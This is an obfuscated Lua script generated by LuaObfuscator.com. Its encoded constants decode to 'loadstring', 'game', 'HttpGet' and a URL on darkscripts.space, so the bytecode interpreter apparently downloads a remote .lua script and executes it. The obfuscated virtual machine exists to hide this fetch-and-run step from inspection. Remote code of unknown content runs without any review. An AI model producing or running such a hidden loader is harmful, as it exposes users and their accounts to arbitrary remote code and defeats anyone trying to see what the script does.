--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v107=v5(v83,v19);v19=nil;return v107;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%((929 -(214 + 713))^(((v33-(1 + (1270 -(226 + 1044)))) -(v32-(1 -0))) + ((3823 -2945) -(282 + 595)))) ;return v84-(v84%((119 -(32 + 85)) -1)) ;else local v85=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v85 + v85))>=v85) and (1066 -(68 + 997))) or 0 ;end end local function v21() local v34=(0 -0) + 0 ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==((1756 -799) -(892 + 65))) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;return (v37 * (188 + 68)) + v36 ;end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * 16777216) + (v41 * (48199 + 17337)) + (v40 * ((2014 -(915 + 82)) -761)) + v39 ;end if (v38==(952 -(802 + 150))) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + ((16 -10) -(2 + 0)) ;v38=1 + 0 ;end end end local function v24() local v43=v23();local v44=v23();local v45=(1139 -(116 + 1022)) -0 ;local v46=(v20(v44,1188 -(1069 + 118) ,45 -25 ) * ((3 -1)^(6 + 26))) + v43 ;local v47=v20(v44,37 -16 ,31 + 0 );local v48=((v20(v44,823 -(368 + (1760 -1337)) )==1) and  -(3 -(2 + 0))) or ((69 -50) -(10 + 8)) ;if (v47==(0 -0)) then if (v46==(442 -(416 + (92 -66)))) then return v48 * (0 -0) ;else v47=(860 -(814 + 45)) + 0 ;v45=0 -0 ;end elseif (v47==(2485 -(145 + 293))) then return ((v46==(430 -(44 + 386))) and (v48 * ((1487 -(998 + 488))/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(838 + (455 -270)) ) * (v45 + (v46/(2^(824 -(201 + 571))))) ;end local function v25(v49) local v50;if  not v49 then local v86=(1423 -(630 + 793)) + 0 ;while true do if (v86==0) then v49=v23();if (v49==(0 + (0 -0))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(886 -(261 + 624)) );v18=v18 + v49 ;local v51={};for v65=1081 -(1020 + 60) , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 -0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v52~=2) then else for v93= #"}",v23() do local v94=(function() return v21();end)();if (v20(v94, #"}", #"{")==(0 -0)) then local v101=(function() return 285 -(134 + 151) ;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if (v101~=(1665 -(970 + 695))) then else local v113=(function() return 0 -0 ;end)();local v114=(function() return;end)();while true do if (v113~=(1990 -(582 + 1408))) then else v114=(function() return 0;end)();while true do if (v114==(3 -2)) then v101=(function() return 1 -0 ;end)();break;end if (v114~=(0 -0)) then else v102=(function() return 0;end)();v103=(function() return nil;end)();v114=(function() return 1825 -(1195 + 629) ;end)();end end break;end end end if (v101~=2) then else while true do if (v102==(0 -0)) then local v148=(function() return 0;end)();local v149=(function() return;end)();while true do if (v148==(241 -(187 + 54))) then v149=(function() return 0;end)();while true do if (v149==1) then v102=(function() return  #"\\";end)();break;end if (v149==(780 -(162 + 618))) then v103=(function() return v20(v94,2, #"-19");end)();v104=(function() return v20(v94, #"?id=",5 + 1 );end)();v149=(function() return 1;end)();end end break;end end end if (v102== #"19(") then if (v20(v104, #"19(", #"xxx")~= #">") then else v105[ #"http"]=(function() return v58[v105[ #"0836"]];end)();end v53[v93]=(function() return v105;end)();break;end if (v102~=(2 + 0)) then else local v151=(function() return 0;end)();local v152=(function() return;end)();while true do if (v151==(0 -0)) then v152=(function() return 0 -0 ;end)();while true do if ((0 + 0)~=v152) then else if (v20(v104, #",", #"!")~= #"|") then else v105[1638 -(1373 + 263) ]=(function() return v58[v105[1002 -(451 + 549) ]];end)();end if (v20(v104,1 + 1 ,2)== #"|") then v105[ #"gha"]=(function() return v58[v105[ #"xxx"]];end)();end v152=(function() return 1;end)();end if (v152==(1 -0)) then v102=(function() return  #"-19";end)();break;end end break;end end end if (v102== #",") then local v153=(function() return 0;end)();while true do if (v153~=(0 -0)) then else v105=(function() return {v22(),v22(),nil,nil};end)();if (v103==(1384 -(746 + 638))) then local v173=(function() return 0 + 0 ;end)();while true do if (v173==0) then v105[ #"xnx"]=(function() return v22();end)();v105[ #"?id="]=(function() return v22();end)();break;end end elseif (v103== #"]") then v105[ #"-19"]=(function() return v23();end)();elseif (v103==(2 -0)) then v105[ #"nil"]=(function() return v23() -(2^16) ;end)();elseif (v103~= #"91(") then else local v184=(function() return 0;end)();while true do if (v184~=0) then else v105[ #"xnx"]=(function() return v23() -(2^16) ;end)();v105[ #"0313"]=(function() return v22();end)();break;end end end v153=(function() return 342 -(218 + 123) ;end)();end if (v153==(1582 -(1535 + 46))) then v102=(function() return 2;end)();break;end end end end break;end if (1==v101) then local v115=(function() return 0;end)();while true do if (v115==1) then v101=(function() return 2 + 0 ;end)();break;end if (v115~=(0 + 0)) then else v104=(function() return nil;end)();v105=(function() return nil;end)();v115=(function() return 561 -(306 + 254) ;end)();end end end end end end for v95= #" ",v23() do v54[v95-#"!" ]=(function() return v28();end)();end return v56;end if (v52== #":") then local v90=(function() return 0 + 0 ;end)();while true do if (v90==0) then v57=(function() return v23();end)();v58=(function() return {};end)();v90=(function() return 1 -0 ;end)();end if (v90==1) then for v108= #"<",v57 do local v109=(function() return 1467 -(899 + 568) ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109~=1) then else v112=(function() return nil;end)();while true do if (v110== #":") then if (v111== #"]") then v112=(function() return v21()~=(0 + 0) ;end)();elseif (v111==(4 -2)) then v112=(function() return v24();end)();elseif (v111== #"91(") then v112=(function() return v25();end)();end v58[v108]=(function() return v112;end)();break;end if (0~=v110) then else local v155=(function() return 603 -(268 + 335) ;end)();local v156=(function() return;end)();while true do if (v155~=(290 -(60 + 230))) then else v156=(function() return 572 -(426 + 146) ;end)();while true do if (v156==1) then v110=(function() return  #"{";end)();break;end if (v156==0) then v111=(function() return v21();end)();v112=(function() return nil;end)();v156=(function() return 1 + 0 ;end)();end end break;end end end end break;end if (v109~=(1456 -(282 + 1174))) then else v110=(function() return 0;end)();v111=(function() return nil;end)();v109=(function() return 1;end)();end end end v56[ #"19("]=(function() return v21();end)();v90=(function() return 2;end)();end if ((813 -(569 + 242))~=v90) then else v52=(function() return 2;end)();break;end end end if (v52==0) then local v91=(function() return 0;end)();local v92=(function() return;end)();while true do if (v91==(0 -0)) then v92=(function() return 0 + 0 ;end)();while true do if (v92~=(1026 -(706 + 318))) then else v52=(function() return  #">";end)();break;end if (v92~=1) then else v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v92=(function() return 1273 -(945 + 326) ;end)();end if (v92==0) then v53=(function() return {};end)();v54=(function() return {};end)();v92=(function() return 2 -1 ;end)();end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[1 + 0 ];local v63=v59[702 -(59 + 212 + 429) ];local v64=v59[3 + 0 ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -(1501 -(1408 + 92));local v73={};local v74={...};local v75=v12("#",...) -(1087 -(461 + (1602 -(553 + 424)))) ;local v76={};local v77={};for v87=(2435 -1147) -(993 + 295) ,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 + 0 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + (1172 -(418 + 753)) ;local v79;local v80;while true do v79=v67[v71];v80=v79[1 + 0 + 0 ];if (v80<=(1 + 6)) then if ((1284<3151) and (v80<=(1 + 2))) then if ((v80<=1) or (1850==1529)) then if (v80>(0 + 0)) then do return;end else v77[v79[(527 + 4) -(406 + 123) ]]=v61[v79[1772 -(1749 + 20) ]];end elseif ((821<2123) and (v80==(1 + 0 + 1))) then local v118=0;local v119;local v120;local v121;local v122;while true do if (v118==2) then for v169=v119,v72 do local v170=1322 -(1249 + 73) ;while true do if (v170==0) then v122=v122 + 1 + 0 ;v77[v169]=v120[v122];break;end end end break;end if (v118==0) then v119=v79[1147 -(466 + 679) ];v120,v121=v70(v77[v119](v13(v77,v119 + (2 -1) ,v79[8 -5 ])));v118=1901 -(106 + 1794) ;end if (v118==(1 + 0)) then v72=(v121 + v119) -(1 + 0 + 0) ;v122=0 -0 ;v118=2;end end else v77[v79[5 -3 ]]();end elseif ((902<2325) and (v80<=5)) then if (v80==(118 -(4 + 63 + 47))) then local v123=584 -(57 + 527) ;local v124;local v125;while true do if (v123==(1428 -(41 + 1386))) then v77[v124 + (104 -(17 + 86)) ]=v125;v77[v124]=v125[v79[3 + 1 ]];break;end if (0==v123) then v124=v79[(6 -3) -1 ];v125=v77[v79[3]];v123=2 -1 ;end end else v77[v79[168 -(122 + (122 -78)) ]]=v79[5 -2 ]~=((0 -0) -0) ;end elseif ((858<=2962) and (v80==(5 + 1))) then local v127=v79[1 + 1 ];local v128=v77[v79[3]];v77[v127 + ((1 + 0) -0) ]=v128;v77[v127]=v128[v79[69 -(30 + 35) ]];else v77[v79[2 + 0 ]]=v79[(6089 -4829) -((1796 -(239 + 514)) + 214) ];end elseif (v80<=(4 + 7)) then if (v80<=(33 -24)) then if (v80==(1220 -((1652 -(797 + 532)) + 646 + 243))) then local v134=0 -0 ;local v135;while true do if ((v134==(580 -(361 + 219))) or (3946<1288)) then v135=v79[2];v77[v135]=v77[v135](v13(v77,v135 + (321 -(53 + 267)) ,v72));break;end end else local v136=0 + 0 ;local v137;local v138;local v139;local v140;while true do if (((140 + 273) -(15 + 398))==v136) then v137=v79[984 -(18 + 964) ];v138,v139=v70(v77[v137](v13(v77,v137 + (2 -1) ,v79[11 -8 ])));v136=1 + 0 ;end if ((1 + (1202 -(373 + 829)))==v136) then v72=(v139 + v137) -(851 -(20 + 830)) ;v140=(731 -(476 + 255)) + 0 ;v136=2;end if ((128 -(116 + 10))==v136) then for v171=v137,v72 do local v172=0 + (1130 -(369 + 761)) ;while true do if ((v172==0) or (3242==567)) then v140=v140 + (739 -(314 + 228 + 196)) ;v77[v171]=v138[v140];break;end end end break;end end end elseif ((v80>(21 -11)) or (847>=1263)) then v77[v79[1 + 1 ]]=v79[3]~=(0 + 0) ;else v77[v79[2]]=v79[3];end elseif (v80<=(5 + 8)) then if (v80>((55 -24) -19)) then do return;end else v77[v79[4 -2 ]]=v61[v79[3]];end elseif (v80==(1565 -(1126 + 425))) then v77[v79[407 -(118 + 287) ]]();else local v146=0 -0 ;local v147;while true do if (v146==(1121 -(118 + 1003))) then v147=v79[5 -3 ];v77[v147]=v77[v147](v13(v77,v147 + (378 -(142 + 235)) ,v72));break;end end end v71=v71 + (4 -(5 -2)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035E3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F37643361366631632D333034372D343765622D623932332D3235633564623530333136615F313331383237342Q332Q37333938393Q38302E6C756100093Q00120C3Q00013Q00120C000100023Q00200600010001000300120A000300044Q000B000400014Q0009000100044Q00085Q00022Q000E3Q000100012Q000D3Q00017Q00",v9(),...);
